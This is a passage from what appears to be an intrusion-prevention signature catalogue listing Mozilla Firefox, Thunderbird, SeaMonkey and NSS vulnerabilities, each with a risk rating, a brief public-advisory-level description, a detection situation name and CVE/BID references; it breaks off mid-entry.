Mozilla-Firefox-Sharedworker-Messageport-Use-After-Free

About this vulnerability: A vulnerability in Mozilla Firefox
Risk: Low
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: There exists a use-after-free vulnerability in Mozilla Firefox. A remote, unauthenticated attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Mozilla-Firefox-Sharedworker-Messageport-Use-After-Free
References:
CVE-2014-1548
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1548
BID-68818
http://www.securityfocus.com/bid/68818
OSVDB-109417
http://www.osvdb.org/109417
Back to top

Mozilla-Firefox-Sidebar-Panel-Arbitrary-Code-Execution

About this vulnerability: A vulnerability in Mozilla Firefox
Risk: Low
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: There exists a vulnerability in Mozilla Firefox. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Mozilla-Firefox-Sidebar-Panel-Arbitrary-Code-Execution
References:
CVE-2005-0402
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0402
BID-12884
http://www.securityfocus.com/bid/12884
Back to top

Mozilla-Firefox-SVG-Animation-Use-After-Free-CVE-2016-9079

About this vulnerability: A use-after-free vulnerability in Mozilla Firefox
Risk: High
First detected in: sgpkg-ips-1003-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: There exists a use-after-free vulnerability in Mozilla Firefox. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Mozilla-Firefox-SVG-Animation-Use-After-Free-CVE-2016-9079
References:
CVE-2016-9079
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9079
Back to top

Mozilla-Firefox-SVG-Element-Processing-Memory-Corruption

About this vulnerability: A vulnerability in Mozilla Firefox allows remote code execution
Risk: High
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Input Validation
Description: A memory corruption vulnerability exists in Mozilla Firefox. The flaw is due to an implemention error while handling SVG elements. A remote attacker can exploit this vulnerability by persuading a target user to open a malicious webpage. Successful attacks could allow for arbitrary code injection and execution within the security privileges of the currently logged on user. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. In the case of an unsuccessful code execution attack, Firefox may terminate abnormally.
Situation: File-Text_Mozilla-Firefox-SVG-Element-Processing-Memory-Corruption
References:
CVE-2009-2469
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2469
BID-35758
http://www.securityfocus.com/bid/35758
Back to top

Mozilla-Firefox-Table-Use-After-Free-CVE-2017-5404

About this vulnerability: A vulnerability in Mozilla Firefox
Risk: High
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Mozilla Firefox
Type: Use-after-free
Description: A use-after-free vulnerability exists in Mozilla Firefox.
Situation: File-Text_Mozilla-Firefox-Table-Use-After-Free-CVE-2017-5404
References:
CVE-2017-5404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5404
Back to top

Mozilla-Firefox-Tag-Order-Memory-Corruption

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: Low
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: There exists a memory corruption vulnerability in Mozilla Firefox. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Mozilla-Firefox-Tag-Order-Memory-Corruption
References:
CVE-2006-0749
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0749
BID-17516
http://www.securityfocus.com/bid/17516
Back to top

Mozilla-Firefox-Thunderbird-SeaMonkey-IDBKeyRange-Use-After-Free

About this vulnerability: A vulnerability in Firefox, Thunderbird and SeaMonkey
Risk: High
First detected in: sgpkg-ips-461-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird
Type: Malfunction
Description: A use-after-free vulnerability has been reported in Mozilla Firefox, Thunderbird, and SeaMonkey. The vulnerability is due to code accessing an IDBKeyRange object after its destruction. An attacker could exploit this vulnerability by enticing a target user to view crafted web content or by sending a target user a crafted email. Successful exploitation of this vulnerability would result in execution of arbitrary attacker code on the target system in the security context of the user running the vulnerable application.
Situation: File-Text_Mozilla-Firefox-Thunderbird-SeaMonkey-IDBKeyRange-Use-After-Free
References:
CVE-2012-0469
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0469
BID-53220
http://www.securityfocus.com/bid/53220
OSVDB-81515
http://www.osvdb.org/81515
Back to top

Mozilla-Firefox-Top-Level-Script-Object-Memory-Corruption

About this vulnerability: A memory corruption vulnerability in Mozilla Foundation Firefox
Risk: High
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: There is a memory corruption vulnerability in Mozilla Firefox web browser. The vulnerability is due to improper calculation of an object offset in a specific case of the top-level script. Remote attackers can exploit this vulnerability by enticing target users to visit a malicious web page. Successful exploitation causes a memory corruption that may lead to arbitrary code execution in the security context of the logged in user, or terminate the application abnormally.
Situation: HTTP_SS-Mozilla-Firefox-Top-Level-Script-Object-Memory-Corruption
File-Text_Mozilla-Firefox-Top-Level-Script-Object-Memory-Corruption
References:
CVE-2009-3073
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3073
BID-36343
http://www.securityfocus.com/bid/36343
Back to top

Mozilla-Firefox-Tracemonkey-Escape-Function-Memory-Corruption

About this vulnerability: A vulnerability in Mozilla Firefox
Risk: High
First detected in: sgpkg-ips-232-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Input Validation
Description: There is a remote code execution vulnerability in Tracemonkey component of Mozilla Firefox.
Situation: HTTP_SS-Mozilla-Firefox-Tracemonkey-Escape-Function-Memory-Corruption
File-Text_Mozilla-Firefox-Tracemonkey-Escape-Function-Memory-Corruption
References:
CVE-2009-2477
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2477
BID-35660
http://www.securityfocus.com/bid/35660
Back to top

Mozilla-Firefox-Unicode-Data-Denial-Of-Service

About this vulnerability: A denial of service vulnerability in Mozilla Firefox
Risk: Moderate
First detected in: sgpkg-ips-233-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Buffer Overflow
Description: There is a denial of service vulnerability in Mozilla Firefox.
Situation: HTTP_SS-Mozilla-Firefox-Unicode-Data-Denial-Of-Service
File-Text_Mozilla-Firefox-Unicode-Data-Denial-Of-Service
References:
CVE-2009-2479
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2479
BID-35707
http://www.securityfocus.com/bid/35707
OSVDB-55931
http://www.osvdb.org/55931
Back to top

Mozilla-Firefox-Unicode-Sequence-Handling-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the handling of some Unicode sequences in Mozilla Firefox
Risk: High
First detected in: sgpkg-ips-40-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla Suite
Type: Buffer Overflow
Description: Firefox Web browser has a buffer overflow vulnerability in the handling of 'zero width joiner' and 'zero width non-joiner' Unicode characters. Remote attacker may be able to exploit this vulnerability to execute arbitrary code on the victim machine.
Situation: HTTP_Mozilla-Firefox-Unicode-Sequence-Handling-Buffer-Overflow
References:
CVE-2005-2702
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2702
BID-14918
http://www.securityfocus.com/bid/14918
Back to top

Mozilla-Firefox-URI-Handling-Vulnerability

About this vulnerability: Mozilla Firefox URI Handling Vulnerability
Risk: Low
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Mozilla Firefox
Type: Malfunction
Description: A vulnerability exists in Firefox 2.0.0.5 and prior.
Situation: File-Text_Mozilla-Firefox-URI-Handling-Vulnerability
Back to top

Mozilla-Firefox-Utf8-Url-Handling-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla SeaMonkey
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Mozilla Firefox.
Situation: HTTP_SS-Mozilla-Firefox-Utf8-Url-Handling-Stack-Buffer-Overflow
File-Text_Mozilla-Firefox-Utf8-Url-Handling-Stack-Buffer-Overflow
References:
CVE-2008-0016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0016
BID-31346
http://www.securityfocus.com/bid/31346
Back to top

Mozilla-Firefox-Webassembly-Table-Integer-Underflow

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: Moderate
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Integer Overflow
Description: Improper script validation causes a table integer underflow vulnerability in Mozilla Firefox. A successful exploit can allow an attacker to run arbitrary code on the target system.
Situation: File-Text_Mozilla-Firefox-Webassembly-Table-Integer-Underflow
References:
CVE-2018-5093
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5093
Back to top

Mozilla-Firefox-Webextensions-Settingcontent.Ms-Policy-Bypass

About this vulnerability: A vulnerability in Mozilla Foundation Firefox ESR
Risk: Moderate
First detected in: sgpkg-ips-1096-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: A design weakness in Firefox allows a malicious WebExtension to open a SettingContent-ms file without a user prompt. A successful exploit may allow the attacker to execute arbitrary commands on the target system.
Situation: HTTP_CS-Mozilla-Firefox-Webextensions-Settingcontent.Ms-Policy-Bypass
References:
CVE-2018-12368
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12368
Back to top

Mozilla-Firefox-WebGL-Integer-Overflow

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: Moderate
First detected in: sgpkg-ips-903-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Integer Overflow
Description: An integer overflow when processing WebGL causes a memory corruption vulnerability in Mozilla Firefox. A successful exploitation may allow a remote attacker to execute arbitrary code on the target system.
Situation: File-Text_Mozilla-Firefox-WebGL-Integer-Overflow
References:
CVE-2017-5459
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5459
Back to top

Mozilla-Firefox-Woff-Font-Processing-Integer-Overflow

About this vulnerability: A vulnerability in Mozilla Firefox
Risk: High
First detected in: sgpkg-ips-297-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Integer Overflow
Description: There is a code execution vulnerability in Mozilla Firefox. The vulnerability is due to an integer overflow error in a font decompression routine within the Web Open Fonts Format (WOFF) decoder. This vulnerability may be exploited by remote attackers to execute arbitrary code on the target machine by enticing a user to open a maliciously crafted WOFF file.
Situation: HTTP_SS-Mozilla-Firefox-Woff-Font-Processing-Integer-Overflow
File-Binary_Mozilla-Firefox-Woff-Font-Processing-Integer-Overflow
References:
CVE-2010-1028
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1028
BID-38298
http://www.securityfocus.com/bid/38298
Back to top

Mozilla-Firefox-XBL-Event-Handler-Tags-Removal-Memory-Corruption

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: High
First detected in: sgpkg-ips-376-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: There exists a memory corruption vulnerability in Mozilla Foundation's family of browser products. The flaw exists in the XBL (Extensible Binding Language) component and specifically happens via dynamic manipulation of XUL Tags inside Event Handlers. A remote attacker can exploit this vulnerability to execute arbitrary code in the security context of the target browser.
Situation: HTTP_SS-Mozilla-Firefox-XBL-Event-Handler-Tags-Removal-Memory-Corruption
File-TextId_Mozilla-Firefox-XBL-Event-Handler-Tags-Removal-Memory-Corruption
References:
CVE-2007-5339
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5339
BID-26132
http://www.securityfocus.com/bid/26132
Back to top

Mozilla-Firefox-XML-Parser-Memory-Corruption-Denial-of-Service

About this vulnerability: Mozilla Firefox XML Parser Memory Corruption Denial of Service vulnerability.
Risk: High
First detected in: sgpkg-ips-669-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Browser
Description: A vulnerability exists in Mozilla Firefox 3.6 that allows remote attackers to cause a denial of service via an XML document which includes a long series of start tags with no corresponding end tags.
Situation: File-Text_Mozilla-Firefox-XML-Parser-Memory-Corruption-Denial-of-Service
Back to top

Mozilla-Firefox-Xmlserializer-Use-After-Free

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: High
First detected in: sgpkg-ips-548-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: A code execution vulnerability exists in Mozilla Firefox. The vulnerability is caused by a use-after-free error when processing script code making use of the XMLSerializer function. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.
Situation: File-Text_Mozilla-Firefox-Xmlserializer-Use-After-Free
References:
CVE-2013-0753
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0753
BID-57209
http://www.securityfocus.com/bid/57209
OSVDB-89021
http://www.osvdb.org/89021
Back to top

Mozilla-Firefox-Xraywrapper-Policy-Bypass

About this vulnerability: A vulnerability in Mozilla Firefox
Risk: High
First detected in: sgpkg-ips-637-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla SeaMonkey
Type: Malfunction
Description: A policy bypass vulnerability has been reported in Mozilla Firefox and SeaMonkey. The vulnerability is due to an issue with processing the derived trap has. A remote attacker can exploit this vulnerability by enticing a victim to open a maliciously crafted webpage. Successful exploitation could lead to chrome:// access.
Situation: File-Text_Mozilla-Firefox-Xraywrapper-Policy-Bypass
References:
CVE-2014-8636
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8636
OSVDB-117005
http://www.osvdb.org/117005
Back to top

Mozilla-Firefox-XSL-Transformation-Memory-Corruption

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: There is a memory corruption vulnerability in Mozilla Firefox. The flaw is due to insufficient validation while processing a malicious XSL stylesheet. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted web page. In a successful attack that arbitrary code being injected and executed on the vulnerable target host, the behaviour of the target system is dependent on the malicious code. Note that any code executed by the attacker runs with the privileges of the logged in user. In an attack where code execution fails, the vulnerable application will terminate abnormally while parsing the malicious document.
Situation: HTTP_CSU-Mozilla-Firefox-XSL-Transformation-Memory-Corruption
References:
CVE-2009-1169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1169
BID-34235
http://www.securityfocus.com/bid/34235
Back to top

Mozilla-Firefox-XUL-menupopup.menu-Null-Pointer-Dereference-DoS

About this vulnerability: Mozilla Firefox XUL menupopup.menu Null Pointer Dereference DoS vulnerability.
Risk: High
First detected in: sgpkg-ips-669-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Browser
Description: A vulnerability exists in Mozilla Firefox, versions before 1.5.0.10, that allows remote attackers to cause a denial of service via a XUL XML documents which includes a null menupopup.menu.
Situation: File-TextId_Mozilla-Firefox-XUL-menupopup.menu-Null-Pointer-Dereference-DoS
References:
CVE-2007-0775
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0775
BID-22694
http://www.securityfocus.com/bid/22694
OSVDB-32114
http://www.osvdb.org/32114
Back to top

Mozilla-Floating-Layer-Column-Layout-DoS

About this vulnerability: Mozilla Floating Layer Column Layout DoS vulnerability.
Risk: High
First detected in: sgpkg-ips-669-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla Thunderbird; Mozilla SeaMonkey
Type: Browser
Description: A vulnerability exists in Mozilla Firefox and Mozilla Thunderbird, versions before 1.5.0.10, and Mozilla Sea Monkey, versions before 1.0.8, that allows remote attackers to cause a denial of service by dynamically creating a new DOM node inside a floating layer with a columnar layout.
Situation: File-Text_Mozilla-Firefox-Floating-Layer-Column-Layout-DoS
References:
CVE-2007-0775
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0775
BID-22694
http://www.securityfocus.com/bid/22694
OSVDB-32114
http://www.osvdb.org/32114
Back to top

Mozilla-JavaScript-String-Replace-Buffer-Overflow

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: High
First detected in: sgpkg-ips-297-4219
Last changed: sgpkg-ips-1412-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla SeaMonkey
Type: Buffer Overflow
Description: Three is a heap buffer overflow vulnerability in Mozilla Firefox and SeaMonkey products. The vulnerability is due to improper processing of a crafted substring when performing the replace operation in JavaScript. A remote attacker can exploit this vulnerability by enticing target users to visit a malicious web page. Successful exploitation of this vulnerability can lead to arbitrary code execution with the privileges of the logged in user.
Situation: HTTP_SS-Mozilla-JavaScript-String-Replace-Buffer-Overflow
References:
CVE-2009-3075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3075
BID-36343
http://www.securityfocus.com/bid/36343
Back to top

Mozilla-Multiple-Products-Array.reduceright-Integer-Overflow

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: High
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird
Type: Integer Overflow
Description: An integer overflow vulnerability has been identified in Mozilla applications. The vulnerability is due to an integer overflow occurring when the reduceRight() method is called on a JavaScript array with an extremely large length. Remote attackers can exploit this vulnerability by enticing target users to open a malicious web page or file, potentially causing arbitrary code to be injected and executed in the security context of the currently logged-on user. In case of a successful attack, the behaviour of the target depends on the intention of the malicious code. If an attack leveraging these vulnerabilities fails, the vulnerable application may terminate abnormally.
Situation: HTTP_SS_Mozilla-Multiple-Products-Array.reduceright-Integer-Overflow
File-Text_Mozilla-Multiple-Products-Array.reduceright-Integer-Overflow
References:
CVE-2011-2371
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2371
Back to top

Mozilla-Multiple-Products-Multiple-Location-Headers

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: Moderate
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird
Type: Input Validation
Description: A vulnerability has been detected in Mozilla Firefox, Thunderbird and SeaMonkey. When multiple Location, Content-Type, Content-Length or Content-Disposition headers are present in an HTTP response, these Mozilla products use the last one, making them more susceptible to newline insertion attacks. An attacker may leverage this vulnerability in conjunction with a vulnerable web application to e.g. redirect target users to malicious URLs.
Situation: HTTP_SHS-Mozilla-Multiple-Products-Multiple-Location-Headers
References:
CVE-2011-3000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3000
OSVDB-75839
http://www.osvdb.org/75839
Back to top

Mozilla-Multiple-Products-Table-Frames-Memory-Corruption

About this vulnerability: A vulnerability in Mozilla Firefox
Risk: Moderate
First detected in: sgpkg-ips-466-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird
Type: Malfunction
Description: There is a code execution vulnerability in Mozilla Firefox, Seamonkey, and Thunderbird. The vulnerability is due to the nsTableFrame::InsertFrames method failing to handle mixed group table frames. A remote attacker could exploit this vulnerability by enticing a user to open a crafted web page. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.
Situation: File-Text_Mozilla-Multiple-Products-Table-Frames-Memory-Corruption
References:
CVE-2012-1952
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1952
OSVDB-83999
http://www.osvdb.org/83999
Back to top

Mozilla-Multiple-Products-WAV-Processing-Buffer-Overflow

About this vulnerability: A vulnerability in Mozilla Firefox
Risk: Moderate
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird
Type: Buffer Overflow
Description: A heap-based buffer overflow vulnerability has been reported in Mozilla's Firefox, Thunderbird, and SeaMonkey products. The vulnerability exists in the nsWaveReader::DecodeAudioData function when processing WAV files. An attacker could exploit this vulnerability by enticing a target user to view crafted web content. Successful exploitation of this vulnerability would possibly result in execution of arbitrary attacker code on the target system in the security context of the user running the vulnerable application.
Situation: File-RIFF_Mozilla-Multiple-Products-WAV-Processing-Buffer-Overflow
References:
CVE-2012-4186
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4186
BID-56135
http://www.securityfocus.com/bid/56135
OSVDB-86117
http://www.osvdb.org/86117
Back to top

Mozilla-Network-Security-Services-RSA-Signature-Forgery

About this vulnerability: A vulnerability in Mozilla Foundation Network Security Services
Risk: High
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla NSS; Chrome
Type: Integer Overflow
Description: An RSA signature forgery vulnerability exists in Mozilla Network Security Services (NSS), the cryptographic library used in many applications including Firefox and Google Chrome. The vulnerability is a result of improper verification of RSA signatures due to incorrect ASN.1 parsing of the DigestInfo structure. A remote attacker could exploit this vulnerability by providing a forged certificate e.g. for a legitimate website. Successful exploitation would result in successful verification of the forged certificate, which could lead to information disclosure, spoofing and policy bypass.
Situation: HTTPS_SS-Mozilla-Network-Security-Services-RSA-Signature-Forgery
References:
CVE-2014-1568
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1568
BID-70116
http://www.securityfocus.com/bid/70116
OSVDB-112036
http://www.osvdb.org/112036
Back to top

Mozilla-Network-Security-Services-SSLv2-Client-Integer-Underflow

About this vulnerability: A vulnerability in Mozilla family of browsers
Risk: Moderate
First detected in: sgpkg-ips-99-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird
Type: Malfunction
Description: There is a heap-based buffer overflow vulnerability in Mozilla Network Security Services (NSS). The vulnerability is due to a design error in the processing of malformed SSLv2 server messages. Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the vulnerable system in the context of the affected application.
Situation: HTTPS_SS-Mozilla-Network-Security-Services-SSLv2-Client-Integer-Underflow
References:
CVE-2007-0008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0008
BID-22694
http://www.securityfocus.com/bid/22694
OSVDB-32105
http://www.osvdb.org/32105
Back to top

Mozilla-Non-Ascii-Hostname-BOF

About this vulnerability: Code execution vulnerability in Mozilla
Risk: Moderate
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Suite; Mozilla Firefox; Mozilla Thunderbird; Netscape
Type: Buffer Overflow
Description: Mozilla browser and its derivates are prone to a remotely-exploitable heap overflow that is exposed when the browser handles non-ASCII characters in URIs. This issue could be exploited by enticing a user to open a hyperlink that references a malicious URI. Successful exploitation will allow execution of arbitrary code in the context of the client user.
Situation: File-Text_Mozilla-Non-Ascii-Hostname-BOF
References:
CVE-2004-0902
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0902
BID-11169
http://www.securityfocus.com/bid/11169
OSVDB-10528
http://www.osvdb.org/10528
Back to top

Mozilla-NSS-Tls-Regexp-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Mozilla NSS regexp handling
Risk: Moderate
First detected in: sgpkg-ips-238-3038
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Mozilla NSS
Type: Buffer Overflow
Description: Mozilla Foundation's Network Security Services (NSS) library suffers from a buffer overflow vulnerability in the handling of server certificates. A specially crafted server certificate may cause a buffer overflow in a client application, allowing remote attackers to execute arbitrary code on the host.
Situation: HTTPS_SS-Mozilla-NSS-Tls-Regexp-Buffer-Overflow
References:
CVE-2009-2404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2404
BID-35891
http://www.securityfocus.com/bid/35891
Back to top

Mozilla-PDFjs-Fontfaceobject-Arbitrary-JavaScript-Code-Execution

About this vulnerability: A vulnerability in Mozilla Foundation PDF.js
Risk: Moderate
First detected in: sgpkg-ips-1744-5242
Last changed: sgpkg-ips-1744-5242
Platform: Generic
Software: Mozilla Firefox
Type: Input Validation
Description: Insufficient validation of the fonts in the opened PDF files causes a Javascript code injection vulnerability in Mozilla Firefox. A successful exploitation allows an attacker to execute arbitrary script code in a user's browser.
Situation: File-PDF_Mozilla-PDFjs-Fontfaceobject-Arbitrary-JavaScript-Code-Execution
References:
CVE-2024-4367
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4367
Back to top

Mozilla-Products-Animation-Timeline-Use-After-Free

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: High
First detected in: sgpkg-ips-1828-5242
Last changed: sgpkg-ips-1828-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla Thunderbird
Type: Malfunction
Description: A use after free vulnerability has been reported for Mozilla Firefox, Firefox ESR, and Thunderbird. The vulnerability is due to accessing freed AnimationTimeline and Animation objects while playing animations. A remote attacker could exploit this vulnerability by enticing a victim to visit a malicious web page or open a crafted email. Successful exploitation could result, in the worst case, in execution of arbitrary code in the context of the vulnerable application.
Situation: File-Text_Mozilla-Products-Animation-Timeline-Use-After-Free
References:
CVE-2024-9680
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9680
Back to top

Mozilla-Products-Ensurecachedattrparamarrays-Integer-Overflow

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: Moderate
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla SeaMonkey
Type: Integer Overflow
Description: An integer overflow vulnerability exists in Mozilla products including Firefox, and SeaMonkey. The vulnerability exists due to an integer value used to store the names and values of plugin parameter elements could overflow, resulting in memory corruption and potentially allowing for arbitrary code execution. Remote attackers could exploit this vulnerability by enticing target users to visit a crafted web page. Successful exploitation would result in arbitrary code execution in the context of the logged on user.
Situation: HTTP_SS-Mozilla-Products-Ensurecachedattrparamarrays-Integer-Overflow
File-Text_Mozilla-Products-Ensurecachedattrparamarrays-Integer-Overflow
References:
CVE-2010-1214
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1214
BID-41842
http://www.securityfocus.com/bid/41842
Back to top

Mozilla-Products-IDN-Spoofing-Vulnerability

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: Low
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Malfunction
Description: There exists a vulnerability in Mozilla Firefox version 1.0 and prior that allows remote attackers to spoof domain names.
Situation: File-Text_Mozilla-Products-IDN-Spoofing-Vulnerability
References:
CVE-2005-0233
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0233
BID-12470
http://www.securityfocus.com/bid/12470
Back to top

Mozilla-Products-MathML-Integer-Overflow

About this vulnerability: Vulnerability in Mozilla based browsers
Risk: High
First detected in: sgpkg-ips-211-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla SeaMonkey
Type: Malfunction
Description: There is an integer overflow vulnerability in various Mozilla based browsers, such as Firefox and Seamonkey. There is no sufficient input validation for the value of the rowspan attribute in the mtd element. A large integer value causes memory corruption and may lead to execution of arbitrary code in the context of the current user.
Situation: HTTP_SS-Mozilla-Products-MathML-Integer-Overflow
File-Text_Mozilla-Products-MathML-Integer-Overflow
References:
CVE-2008-4061
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4061
BID-31346
http://www.securityfocus.com/bid/31346
Back to top

Mozilla-Products-Nscssvalue-Array-Index-Integer-Overflow

About this vulnerability: A vulnerability in Mozilla Firefox
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird
Type: Integer Overflow
Description: There is an integer overflow vulnerability in Mozilla products including Firefox, Thunderbird and SeaMonkey. The vulnerability exists due to a 16-bit integer value used in allocating the size of the array class to store CSS values that could overflow, resulting in too small a memory buffer being created. Remote attackers could exploit this vulnerability by enticing target users to visit a crafted web page. Successful exploitation would result in arbitrary code execution in the context of the logged on user.
Situation: File-Text_Mozilla-Products-Nscssvalue-Array-Index-Integer-Overflow
References:
CVE-2010-2752
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2752
BID-41852
http://www.securityfocus.com/bid/41852
Back to top

Mozilla-Products-Overflow-Event-Handling-Memory-Corruption

About this vulnerability: A memory corruption vulnerability in multiple Mozilla Foundation products
Risk: High
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird
Type: Malfunction
